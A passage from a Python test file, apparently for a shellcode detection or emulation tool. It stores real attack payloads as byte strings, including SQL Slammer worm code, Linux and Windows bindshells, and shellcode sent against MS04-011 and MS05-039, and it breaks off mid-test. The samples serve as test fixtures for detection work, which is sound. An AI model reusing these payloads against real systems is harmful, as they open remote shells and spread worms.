b"\x8f\x69\x08\x00\x3e\x30\x05\x1b\x01\x00\x00\x00\x04\x5d\x88\x8a" 1272 | shellcode += b"\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00" 1273 | shellcode += b"\x00\x00\x08\x90\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc8" 1274 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04" 1275 | shellcode += b"\x00\x08\x60\x00\x10\x00\x00\x3c\x08\x00\x00\x00\x01\x00\x00\x00" 1276 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x3c\x08\x54\x00\x02" 1277 | shellcode += b"\x00\x26\x00\x00\x40\x4d\x08\x00\x5c\x00\x50\x00\x49\x00\x50\x00" 1278 | shellcode += b"\x45\x00\x5c\x00\x00\x00\x40\x00\x05\x00\x00\x03\x10\x00\x00\x00" 1279 | shellcode += b"\x3c\x08\x00\x00\x01\x00\x00\x00\x24\x08\x00\x00\x00\x00\x36\x00" 1280 | shellcode += b"\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x52\x00\x4f\x00" 1281 | shellcode += b"\x4f\x00\x54\x00\x5c\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00" 1282 | shellcode += b"\x4d\x00\x5c\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00" 1283 | shellcode += b"\xff\xff\x00\x00\xe0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 1284 | shellcode += b"\xc0\x07\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90" 1285 | shellcode += b"\xeb\x08\x90\x90\x67\x15\x7a\x76\xeb\x08\x90\x90\x67\x15\x7a\x76" 1286 | shellcode += b"\xeb\x08\x90\x90\x67\x15\x7a\x76\xeb\x08\x90\x90\x67\x15\x7a\x76" 1287 | shellcode += b"\xeb\x08\x90\x90\x67\x15\x7a\x76\xeb\x08\x90\x90\x67\x15\x7a\x76" 1288 | shellcode += b"\xeb\x08\x90\x90\x67\x15\x7a\x76\xeb\x08\x90\x90\x67\x15\x7a\x76" 1289 | shellcode += b"\xeb\x08\x90\x90\x67\x15\x7a\x76\xeb\x08\x90\x90\x67\x15\x7a\x76" 1290 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\xeb\x08\x90\x90\x48\x4f\x44\x88\x90" 1291 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1292 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1293 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff" 1294 | shellcode += b"\xff\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" 1295 | shellcode += b"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99" 1296 | shellcode += b"\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28" 1297 | shellcode += b"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" 1298 | shellcode += b"\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b" 1299 | shellcode += b"\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50" 1300 | shellcode += b"\xff\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0" 1301 | shellcode += b"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08\x02" 1302 | shellcode += b"\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53\x53\x53" 1303 | shellcode += b"\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x22\xb8\x66\x53\x89\xe1" 1304 | shellcode += b"\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x68" 1305 | shellcode += b"\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x55\xff\xd0\x68\xe5\x49\x86\x49" 1306 | shellcode += b"\x57\xff\xd6\x50\x54\x54\x55\xff\xd0\x93\x68\xe7\x79\xc6\x79\x57" 1307 | shellcode += b"\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x89\xe5\x6a\x50" 1308 | shellcode += b"\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d" 1309 | shellcode += b"\xfe\x42\x2c\x93\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff" 1310 | shellcode += b"\x75\x44\xff\xd6\x5b\x57\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51" 1311 | shellcode += b"\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0" 1312 | shellcode += b"\x8b\x57\xfc\x83\xc4\x64\xff\xd6\x52\xff\xd0\x68\xef\xce\xe0\x60" 1313 | shellcode += b"\x53\xff\xd6\xff\xd0\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90" 1314 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1315 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1316 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1317 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1318 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1319 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1320 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1321 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1322 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1323 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1324 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1325 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1326 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1327 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1328 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1329 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1330 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1331 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1332 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1333 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1334 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1335 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1336 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1337 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1338 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1339 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1340 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1341 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1342 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1343 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1344 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1345 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1346 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1347 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1348 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1349 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1350 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1351 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1352 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1353 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1354 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1355 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1356 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1357 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1358 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1359 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1360 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1361 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1362 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1363 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1364 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1365 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1366 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1367 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1368 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1369 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1370 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1371 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1372 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1373 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1374 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1375 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1376 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1377 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1378 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1379 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1380 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1381 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1382 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1383 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1384 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1385 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1386 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1387 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1388 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1389 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1390 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1391 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1392 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1393 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1394 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1395 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1396 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1397 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1398 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1399 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1400 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1401 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1402 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1403 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1404 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1405 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1406 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1407 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1408 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 1409 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\xe0\x07\x00\x00\x04\x00\x00\x00" 1410 | shellcode += b"\x00\x00\x00\x00" 1411 | 1412 | self.runShellcode(shellcode, 23) 1413 | 1414 | def testShellcode24(self): 1415 | """ 1416 | SQLSlammer 1417 | """ 1418 | 1419 | shellcode = b"\x90\x90\x90\x90\x90\x90\x90\x90\x68\xdc\xc9" 1420 | shellcode += b"\xb0\x42\xb8\x01\x01\x01\x01\x31\xc9\xb1\x18\x50\xe2\xfd\x35\x01" 1421 | shellcode += b"\x01\x01\x05\x50\x89\xe5\x51\x68\x2e\x64\x6c\x6c\x68\x65\x6c\x33" 1422 | shellcode += b"\x32\x68\x6b\x65\x72\x6e\x51\x68\x6f\x75\x6e\x74\x68\x69\x63\x6b" 1423 | shellcode += b"\x43\x68\x47\x65\x74\x54\x66\xb9\x6c\x6c\x51\x68\x33\x32\x2e\x64" 1424 | shellcode += b"\x68\x77\x73\x32\x5f\x66\xb9\x65\x74\x51\x68\x73\x6f\x63\x6b\x66" 1425 | shellcode += b"\xb9\x74\x6f\x51\x68\x73\x65\x6e\x64\xbe\x18\x10\xae\x42\x8d\x45" 1426 | shellcode += b"\xd4\x50\xff\x16\x50\x8d\x45\xe0\x50\x8d\x45\xf0\x50\xff\x16\x50" 1427 | shellcode += b"\xbe\x10\x10\xae\x42\x8b\x1e\x8b\x03\x3d\x55\x8b\xec\x51\x74\x05" 1428 | shellcode += b"\xbe\x1c\x10\xae\x42\xff\x16\xff\xd0\x31\xc9\x51\x51\x50\x81\xf1" 1429 | shellcode += b"\x03\x01\x04\x9b\x81\xf1\x01\x01\x01\x01\x51\x8d\x45\xcc\x50\x8b" 1430 | shellcode += b"\x45\xc0\x50\xff\x16\x6a\x11\x6a\x02\x6a\x02\xff\xd0\x50\x8d\x45" 1431 | shellcode += b"\xc4\x50\x8b\x45\xc0\x50\xff\x16\x89\xc6\x09\xdb\x81\xf3\x3c\x61" 1432 | shellcode += b"\xd9\xff\x8b\x45\xb4\x8d\x0c\x40\x8d\x14\x88\xc1\xe2\x04\x01\xc2" 1433 | shellcode += b"\xc1\xe2\x08\x29\xc2\x8d\x04\x90\x01\xd8\x89\x45\xb4\x6a\x10\x8d" 1434 | shellcode += b"\x45\xb0\x50\x31\xc9\x51\x66\x81\xf1\x78\x01\x51\x8d\x45\x03\x50" 1435 | shellcode += b"\x8b\x45\xac\x50\xff\xd6\xeb\xca" 1436 | 1437 | self.runShellcode(shellcode, 24) 1438 | 1439 | def testShellcode25(self): 1440 | """ 1441 | Linux bindshell 1442 | """ 1443 | 1444 | shellcode = b"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80" 1445 | shellcode += b"\x89\xc7\x52\x66\x68\x4e\x20\x43\x66\x53\x89\xe1\xb0\xef\xf6\xd0" 1446 | shellcode += b"\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\x43\x43\xcd\x80\x50" 1447 | shellcode += b"\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49" 1448 | shellcode += b"\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69" 1449 | shellcode += b"\x89\xe3\x51\x53\x89\xe1\xb0\xf4\xf6\xd0\xcd\x80" 1450 | 1451 | self.runShellcode(shellcode, 25) 1452 | 1453 | def testShellcode26(self): 1454 | """ 1455 | Windows bindshell 0.0.0.0:8594 - tried exploit PNP_QueryResConfList/MS05-39 1456 | """ 1457 | 1458 | shellcode = b"\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00\x5c\x00\x30" # |.S.Y.S.T.E.M.\.0| 1459 | shellcode += b"\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00\xff\xff\x00\x00\xe0" # |.0.0.0..........| 1460 | shellcode += b"\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x07\x00\x00\x00" # |................| 1461 | shellcode += b"\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x08\x90\x90\x67" # |...............g| 1462 | shellcode += b"\x15\x7a\x76\xeb\x08\x90\x90\x67\x15\x7a\x76\xeb\x08\x90\x90\x67" # |.zv....g.zv....g| 1463 | shellcode += b"\x15\x7a\x76\xeb\x08\x90\x90\x67\x15\x7a\x76\xeb\x08\x90\x90\x67" # |.zv....g.zv....g| 1464 | shellcode += b"\x15\x7a\x76\xeb\x08\x90\x90\x67\x15\x7a\x76\xeb\x08\x90\x90\x67" # |.zv....g.zv....g| 1465 | shellcode += b"\x15\x7a\x76\xeb\x08\x90\x90\x67\x15\x7a\x76\xeb\x08\x90\x90\x67" # |.zv....g.zv....g| 1466 | shellcode += b"\x15\x7a\x76\xeb\x08\x90\x90\x67\x15\x7a\x76\x90\x90\x90\x90\x90" # |.zv....g.zv.....| 1467 | shellcode += b"\x90\x90\xeb\x08\x90\x90\x48\x4f\x44\x88\x90\x90\x90\x90\x90\x90" # |......HOD.......| 1468 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x29\xc9\x83\xe9\xb0" # |...........)....| 1469 | shellcode += b"\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19\xf5\x04\x37\x83\xeb" # |...t$.[.s....7..| 1470 | shellcode += b"\xfc\xe2\xf4\xe5\x9f\xef\x7a\xf1\x0c\xfb\xc8\xe6\x95\x8f\x5b\x3d" # |......z.......[=| 1471 | shellcode += b"\xd1\x8f\x72\x25\x7e\x78\x32\x61\xf4\xeb\xbc\x56\xed\x8f\x68\x39" # |..r%~x2a...V..h9| 1472 | shellcode += b"\xf4\xef\x7e\x92\xc1\x8f\x36\xf7\xc4\xc4\xae\xb5\x71\xc4\x43\x1e" # |..~...6.....q.C.| 1473 | shellcode += b"\x34\xce\x3a\x18\x37\xef\xc3\x22\xa1\x20\x1f\x6c\x10\x8f\x68\x3d" # |4.:.7...\x.l..h=| 1474 | shellcode += b"\xf4\xef\x51\x92\xf9\x4f\xbc\x46\xe9\x05\xdc\x1a\xd9\x8f\xbe\x75" # |..Q..O.F.......u| 1475 | shellcode += b"\xd1\x18\x56\xda\xc4\xdf\x53\x92\xb6\x34\xbc\x59\xf9\x8f\x47\x05" # |..V...S..4.Y..G.| 1476 | shellcode += b"\x58\x8f\x77\x11\xab\x6c\xb9\x57\xfb\xe8\x67\xe6\x23\x62\x64\x7f" # |X.w..l.W..g.#bd.| 1477 | shellcode += b"\x9d\x37\x05\x71\x82\x77\x05\x46\xa1\xfb\xe7\x71\x3e\xe9\xcb\x22" # |.7.q.w.F...q>.."| 1478 | shellcode += b"\xa5\xfb\xe1\x46\x7c\xe1\x51\x98\x18\x0c\x35\x4c\x9f\x06\xc8\xc9" # |...F|.Q...5L....| 1479 | shellcode += b"\x9d\xdd\x3e\xec\x58\x53\xc8\xcf\xa6\x57\x64\x4a\xa6\x47\x64\x5a" # |..>.XS...WdJ.GdZ| 1480 | shellcode += b"\xa6\xfb\xe7\x7f\x9d\x25\xa5\x7f\xa6\x8d\xd6\x8c\x9d\xa0\x2d\x69" # |.....%........-i| 1481 | shellcode += b"\x32\x53\xc8\xcf\x9f\x14\x66\x4c\x0a\xd4\x5f\xbd\x58\x2a\xde\x4e" # |2S....fL.._.X*.N| 1482 | shellcode += b"\x0a\xd2\x64\x4c\x0a\xd4\x5f\xfc\xbc\x82\x7e\x4e\x0a\xd2\x67\x4d" # |..dL.._...~N..gM| 1483 | shellcode += b"\xa1\x51\xc8\xc9\x66\x6c\xd0\x60\x33\x7d\x60\xe6\x23\x51\xc8\xc9" # |.Q..fl.`3}`.#Q..| 1484 | shellcode += b"\x93\x6e\x53\x7f\x9d\x67\x5a\x90\x10\x6e\x67\x40\xdc\xc8\xbe\xfe" # |.nS..gZ..ng@....| 1485 | shellcode += b"\x9f\x40\xbe\xfb\xc4\xc4\xc4\xb3\x0b\x46\x1a\xe7\xb7\x28\xa4\x94" # |.@.......F...(..| 1486 | shellcode += b"\x8f\x3c\x9c\xb2\x5e\x6c\x45\xe7\x46\x12\xc8\x6c\xb1\xfb\xe1\x42" # |.<..^lE.F..l...B| 1487 | shellcode += b"\xa2\x56\x66\x48\xa4\x6e\x36\x48\xa4\x51\x66\xe6\x25\x6c\x9a\xc0" # |.VfH.n6H.Qf.%l..| 1488 | shellcode += b"\xf0\xca\x64\xe6\x23\x6e\xc8\xe6\xc2\xfb\xe7\x92\xa2\xf8\xb4\xdd" # |..d.#n..........| 1489 | shellcode += b"\x91\xfb\xe1\x4b\x0a\xd4\x5f\xf6\x3b\xe4\x57\x4a\x0a\xd2\xc8\xc9" # |...K.._.;.WJ....| 1490 | shellcode += b"\xf5\x04\x37" # |..7| 1491 | 1492 | self.runShellcode(shellcode, 26) 1493 | 1494 | def testShellcode27(self): 1495 | """ 1496 | Windows bind filetransfer 0.0.0.0:38963 - tried to exploit DsRolerUpgradeDownlevelServer/MS04-11 1497 | """ 1498 | 1499 | shellcode = b"\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65" # |eeeeeeeeeeeeeeee| 1500 | shellcode += b"\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65" # |eeeeeeeeeeeeeeee| 1501 | shellcode += b"\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65" # |eeeeeeeeeeeeeeee| 1502 | shellcode += b"\x65\x65\x65\x65\x65\x65\xeb\x02\xeb\x6b\xe8\xf9\xff\xff\xff\x53" # |eeeeee...k.....S| 1503 | shellcode += b"\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x03\xd5" # |UVW.l$..E<.T.x..| 1504 | shellcode += b"\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x32\x49\x8b\x34\x8b\x03\xf5" # |.J..Z\x...2I.4...| 1505 | shellcode += b"\x33\xff\xfc\x33\xc0\xac\x3a\xc4\x74\x07\xc1\xcf\x0d\x03\xf8\xeb" # |3..3..:.t.......| 1506 | shellcode += b"\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b\x0c\x4b" # |.;|$.u..Z$..f..K| 1507 | shellcode += b"\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xeb\x02\x33\xc0\x5f\x5e" # |.Z..........3._^| 1508 | shellcode += b"\x5d\x5b\x89\x44\x24\x04\x8b\x04\x24\x89\x44\x24\x08\x8b\x44\x24" # |][.D$...$.D$..D$| 1509 | shellcode += b"\x04\x83\xc4\x08\xc3\x5e\x6a\x30\x59\x64\x8b\x19\x8b\x5b\x0c\x8b" # |.....^j0Yd...[..| 1510 | shellcode += b"\x5b\x1c\x8b\x1b\x8b\x7b\x08\x83\xec\x1c\x8b\xec\x33\xc0\x50\x68" # |[....{......3.Ph| 1511 | shellcode += b"\x2e\x65\x78\x65\x89\x65\x14\x57\x68\xea\x49\x8a\xe8\xff\xd6\x6a" # |.exe.e.Wh.I....j| 1512 | shellcode += b"\x06\xff\x75\x14\xff\xd0\x89\x45\x04\x57\x68\xdb\x8a\x23\xe9\xff" # |..u....E.Wh..#..| 1513 | shellcode += b"\xd6\x89\x45\x0c\x57\x68\x8e\x4e\x0e\xec\xff\xd6\x33\xc9\x66\xb9" # |..E.Wh.N....3.f.| 1514 | shellcode += b"\x6c\x6c\x51\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\xd0" # |llQh32.dhws2_T..| 1515 | shellcode += b"\x8b\xd8\x53\x68\xb6\x19\x18\xe7\xff\xd6\x89\x45\x10\x53\x68\xe7" # |..Sh.......E.Sh.| 1516 | shellcode += b"\x79\xc6\x79\xff\xd6\x89\x45\x18\x53\x68\x6e\x0b\x2f\x49\xff\xd6" # |y.y...E.Shn./I..| 1517 | shellcode += b"\x6a\x06\x6a\x01\x6a\x02\xff\xd0\x89\x45\x08\x33\xc0\x50\x50\x50" # |j.j.j....E.3.PPP| 1518 | shellcode += b"\xb8\x02\xff\x98\x33\x80\xf4\xff\x50\x8b\xc4\x6a\x10\x50\xff\x75" # |....3...P..j.P.u| 1519 | shellcode += b"\x08\x53\x68\xa4\x1a\x70\xc7\xff\xd6\xff\xd0\x58\x53\x68\xa4\xad" # |.Sh..p.....XSh..| 1520 | shellcode += b"\x2e\xe9\xff\xd6\x6a\x10\xff\x75\x08\xff\xd0\x33\xc0\x50\x50\xff" # |....j..u...3.PP.| 1521 | shellcode += 